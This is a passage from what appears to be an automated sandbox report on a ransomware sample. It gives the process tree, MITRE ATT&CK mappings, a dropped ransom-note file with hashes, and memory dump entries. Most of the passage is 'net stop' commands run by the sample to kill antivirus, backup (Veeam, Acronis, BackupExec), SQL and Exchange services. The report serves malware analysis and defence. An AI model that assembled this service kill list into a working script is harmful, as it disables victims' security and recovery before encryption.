    PID:5384
- C:\Windows\system32\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:3396
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_service /y
    3⤵
    PID:5508
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:3388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3⤵
    PID:5016
- C:\Windows\system32\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:3380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_filter /y
    3⤵
    PID:5220
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:3348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:5212
- C:\Windows\system32\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:3340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AVP /y
    3⤵
    PID:5856
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:3332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    3⤵
    PID:5484
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:3324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
    3⤵
    PID:4012
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:3316
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:5328
- C:\Windows\system32\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:3308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Antivirus /y
    3⤵
    PID:5844
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:3300
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:5476
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:3292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:2816
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:3284
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:5308
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:3276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROD /y
    3⤵
    PID:5904
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:3268
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:5276
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:3260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
    3⤵
    PID:5928
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:3252
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:5424
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:3244
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
    3⤵
    PID:2980
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:3236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
    3⤵
    PID:5240
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:3228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:3764
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:3220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:5416
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:3212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
    3⤵
    PID:5836
- C:\Windows\system32\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:3204
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop audioendpointbuilder /y
    3⤵
    PID:5284
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:3196
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
    3⤵
    PID:3496
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:3188
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Health Service” /y
    3⤵
    PID:5500
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:3180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSRS /y
    3⤵
    PID:5684
- C:\Windows\system32\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:3172
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop W3Svc /y
    3⤵
    PID:5432
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:3164
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:5804
- C:\Windows\system32\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:3156
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:5516
- C:\Windows\system32\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
  PID:3148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EraserSvc11710 /y
    3⤵
    PID:1140
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:3132
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:940
- C:\Windows\system32\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:3124
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Agent” /y
  2⤵
  PID:3108
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:3092
- C:\Windows\system32\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:3084
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop IISAdmin /y
    3⤵
    PID:3712
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:3076
- C:\Windows\system32\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:576
- C:\Windows\system32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:2976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:5920
- C:\Windows\system32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:2388
- C:\Windows\system32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:3056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:2208
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:644
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:1896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:5912
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:1708
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:2400
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:3840
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:2980
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:2356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:5896
- C:\Windows\system32\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:2680
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:632
- C:\Windows\system32\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:2480
- C:\Windows\system32\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:2288
- C:\Windows\system32\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:2372
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:2296
- C:\Windows\system32\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:2316
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:960
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:2540
- C:\Windows\system32\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:2092
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:2800
- C:\Windows\system32\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:2404
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:2848
- C:\Windows\system32\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:2512
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:2392
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:2936
- C:\Windows\system32\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:2464
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:2776
- C:\Windows\system32\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:1736
- C:\Windows\system32\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:1424
- C:\Windows\system32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:1108
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:768
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:2420
- C:\Windows\system32\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:2240
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:2516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
    3⤵
    PID:2032
- C:\Windows\system32\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:2880
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:2396
- C:\Windows\system32\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:1788
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:2728
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:3016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3⤵
    PID:3688
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:3000
- C:\Windows\system32\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:2300
- C:\Windows\system32\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:2900
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:1652
- C:\Windows\system32\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:2648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RESvc /y
    3⤵
    PID:3036
- C:\Windows\system32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:2444
- C:\Windows\system32\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:2468
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:2984
- C:\Windows\system32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:2696
- C:\Windows\system32\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:2220
- C:\Windows\system32\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:2632
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:2664
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:2604
- C:\Windows\system32\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:2960
- C:\Windows\system32\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:2128
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:792
- C:\Windows\system32\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:2160
- C:\Windows\system32\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:2188
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:2192
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:1564
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:2264
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:2064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:2328
- C:\Windows\system32\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:2112
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:824
- C:\Windows\system32\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:1068
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:1840
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:364
- C:\Windows\system32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:2360
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:980
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:1800

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
1⤵
PID:1652

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop bedbg /y
1⤵
PID:1152

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:2168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
1⤵
PID:2208

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
1⤵
PID:2540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:2524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:2480

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:2448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:2440

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
1⤵
PID:2328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
1⤵
PID:2288

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:2100

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
1⤵
PID:2084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
1⤵
PID:1696

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "51940228-1081007461-9277511728073457031039368793-1750283002-539794982-105194847"
1⤵
PID:2460

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1644414640213033289-363728394-2137076937-1476431843-20480001323851988991372910228"
1⤵
PID:668

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1475496141-615221850665454916149333507011840564621346537601-1836616532672693260"
1⤵
PID:1140

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:3744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:3776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:3784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVService /y
1⤵
PID:4004

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-62459104051217120-496768362-14100119431428607163-105506954643007919531346352"
1⤵
PID:1268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
1⤵
PID:1012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfefire /y
1⤵
PID:2496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:3788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
1⤵
PID:2508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfemms /y
1⤵
PID:2340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:1612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
1⤵
PID:2124

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
1⤵
PID:2592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
1⤵
PID:2216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
1⤵
PID:2212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
1⤵
PID:4264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
1⤵
PID:4256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:4248

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
1⤵
PID:4868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SntpService /y
1⤵
PID:4916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:4928

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
1⤵
PID:4936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
1⤵
PID:5008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:3848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:2408

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5203639381236807049-110820956674199976520394719603835521871367437466-1232854068"
1⤵
PID:2500

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2043080860-1787999877-521402834-19620585072117856655577842226-2010542131297522267"
1⤵
PID:920

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
1⤵
PID:5108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
1⤵
PID:5064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
1⤵
PID:3760

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1604902438-58067694-1575112417-1395295916-1351734937-116338115519380168202032032070"
1⤵
PID:1696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
1⤵
PID:3012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
1⤵
PID:3924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update /y
1⤵
PID:2124

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
1⤵
PID:2488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
1⤵
PID:2596

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
1⤵
PID:3752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
1⤵
PID:3736

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1504111030-1267256049106667397514698826318963117351231894018453999741478497117"
1⤵
PID:2448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
1⤵
PID:2984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:2752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:4872

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
1⤵
PID:2136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
1⤵
PID:2768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:3716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
1⤵
PID:2880

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:2084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
1⤵
PID:4108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
1⤵
PID:2272

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
1⤵
PID:4212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:4164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:4148

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "14405771791216035540189149860-881485595-4336116210510598431569691304-1136356514"
1⤵
PID:2168

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "573882644900337926733072562-12907772341967730842035243260-1560141801332343251"
1⤵
PID:2184

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

MD5
c4048e6599fa6ba9bab6161316636b2b

SHA1
96e07abc828271c6ef1e60d2525bc410c730978a

SHA256
a416c1ad2cbcba083be2c2dc84fa7edd1bfcb1c7dcfd07bd7d154381c086e6ce

SHA512
1eb261056d1085c4719ca63437672456038cdfc9c0a9b2e321cb464b544bbab5c6c1f61565269bcf308a6aa27d61a01ec004ea5388acb167246a83cebb9da56d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
d3c2112bae4331b7dadeaa10f1c6b73e

SHA1
7ac580c83f3464cfb6d06100163d1c2d12be2e0f

SHA256
17f7a2e8a77c10802407ddf18d05f9ea89b6a3b84fc0bc6780ee9728c092b664

SHA512
5d3cbf061a6907023ee9adc4d56767305b94cedfa4dc5c7e4232c77a242b37c9ff3ffabe5e023e1284a024cf8eab6ecc4d52371e23b6bb9ce36af9f4bcb798b0

Download Submit
memory/240-89-0x0000000000000000-mapping.dmp

Download
memory/364-69-0x0000000000000000-mapping.dmp

Download
memory/576-63-0x0000000000000000-mapping.dmp

Download
memory/628-90-0x0000000000000000-mapping.dmp

Download
memory/632-72-0x0000000000000000-mapping.dmp

Download
memory/644-86-0x0000000000000000-mapping.dmp

Download
memory/668-98-0x0000000000000000-mapping.dmp

Download
memory/768-100-0x0000000000000000-mapping.dmp

Download
memory/872-75-0x0000000000000000-mapping.dmp

Download
memory/920-92-0x0000000000000000-mapping.dmp

Download
memory/936-77-0x0000000000000000-mapping.dmp

Download
memory/980-82-0x0000000000000000-mapping.dmp

Download
memory/1012-64-0x0000000000000000-mapping.dmp

Download
memory/1016-70-0x0000000000000000-mapping.dmp

Download
memory/1016-79-0x000007FEFC2E1000-0x000007FEFC2E3000-memory.dmp

Filesize
8KB

Download
memory/1020-93-0x0000000000000000-mapping.dmp

Download
memory/1052-73-0x0000000000000000-mapping.dmp

Download
memory/1060-74-0x0000000000000000-mapping.dmp

Download
memory/1068-68-0x0000000000000000-mapping.dmp

Download
memory/1140-94-0x0000000000000000-mapping.dmp

Download
memory/1152-87-0x0000000000000000-mapping.dmp

Download
memory/1168-67-0x0000000000000000-mapping.dmp

Download
memory/1268-95-0x0000000000000000-mapping.dmp

Download
memory/1340-135-0x0000000002390000-0x0000000002391000-memory.dmp

Filesize
4KB

Download
memory/1340-91-0x0000000000000000-mapping.dmp

Download
memory/1340-133-0x000000001AD04000-0x000000001AD06000-memory.dmp

Filesize
8KB

Download
memory/1340-132-0x000000001AD00000-0x000000001AD02000-memory.dmp

Filesize
8KB

Download
memory/1340-131-0x000000001AD80000-0x000000001AD81000-memory.dmp

Filesize
4KB

Download
memory/1340-130-0x00000000022C0000-0x00000000022C1000-memory.dmp

Filesize
4KB

Download
memory/1340-139-0x000000001A930000-0x000000001A931000-memory.dmp

Filesize
4KB

Download
memory/1340-136-0x00000000025D0000-0x00000000025D1000-memory.dmp

Filesize
4KB

Download
memory/1340-134-0x0000000001F40000-0x0000000001F41000-memory.dmp

Filesize
4KB

Download
memory/1352-97-0x0000000000000000-mapping.dmp

Download
memory/1508-85-0x0000000000000000-mapping.dmp

Download
memory/1520-62-0x0000000000000000-mapping.dmp

Download
memory/1588-99-0x0000000000000000-mapping.dmp

Download
memory/1652-88-0x0000000000000000-mapping.dmp

Download
memory/1684-96-0x0000000000000000-mapping.dmp

Download
memory/1696-101-0x0000000000000000-mapping.dmp

Download
memory/1708-65-0x0000000000000000-mapping.dmp

Download
memory/1716-66-0x0000000000000000-mapping.dmp

Download
memory/1772-81-0x0000000000000000-mapping.dmp

Download
memory/1800-102-0x0000000000000000-mapping.dmp

Download
memory/1804-84-0x0000000000000000-mapping.dmp

Download
memory/1836-76-0x0000000000000000-mapping.dmp

Download
memory/1840-78-0x0000000000000000-mapping.dmp

Download
memory/1908-80-0x000000001B6F0000-0x000000001B6F2000-memory.dmp

Filesize
8KB

Download
memory/1908-60-0x0000000000DF0000-0x0000000000DF1000-memory.dmp

Filesize
4KB

Download
memory/2032-71-0x0000000000000000-mapping.dmp

Download
memory/2056-103-0x0000000000000000-mapping.dmp

Download
memory/2084-105-0x0000000000000000-mapping.dmp

Download
memory/2100-106-0x0000000000000000-mapping.dmp

Download
memory/2112-107-0x0000000000000000-mapping.dmp

Download
memory/2124-108-0x0000000000000000-mapping.dmp

Download
memory/2148-109-0x0000000000000000-mapping.dmp

Download
memory/2168-110-0x0000000000000000-mapping.dmp

Download
memory/2184-111-0x0000000000000000-mapping.dmp

Download
memory/2208-112-0x0000000000000000-mapping.dmp

Download
memory/2224-113-0x0000000000000000-mapping.dmp

Download
memory/2236-114-0x0000000000000000-mapping.dmp

Download
memory/2248-115-0x0000000000000000-mapping.dmp

Download
memory/2276-116-0x0000000000000000-mapping.dmp

Download
memory/2288-117-0x0000000000000000-mapping.dmp

Download
memory/2312-118-0x0000000000000000-mapping.dmp

Download
memory/2328-119-0x0000000000000000-mapping.dmp

Download
memory/2360-120-0x0000000000000000-mapping.dmp

Download
memory/2372-121-0x0000000000000000-mapping.dmp

Download
memory/2384-122-0x0000000000000000-mapping.dmp

Download
memory/2400-123-0x0000000000000000-mapping.dmp

Download
memory/2440-124-0x0000000000000000-mapping.dmp

Download
memory/2448-126-0x0000000000000000-mapping.dmp

Download
memory/2460-125-0x0000000000000000-mapping.dmp

Download
memory/2480-127-0x0000000000000000-mapping.dmp

Download
memory/2500-128-0x0000000000000000-mapping.dmp

Download
memory/2524-129-0x0000000000000000-mapping.dmp

Download
memory/2656-148-0x000000001AA40000-0x000000001AA42000-memory.dmp

Filesize
8KB

Download